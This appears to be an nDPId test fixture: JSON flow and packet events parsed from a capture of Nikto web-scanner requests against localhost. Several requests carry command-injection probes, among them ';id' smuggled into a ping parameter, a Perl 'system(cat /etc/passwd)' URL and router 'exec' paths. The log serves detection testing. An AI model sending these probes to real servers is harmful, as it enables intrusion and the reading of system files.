+01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} +01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 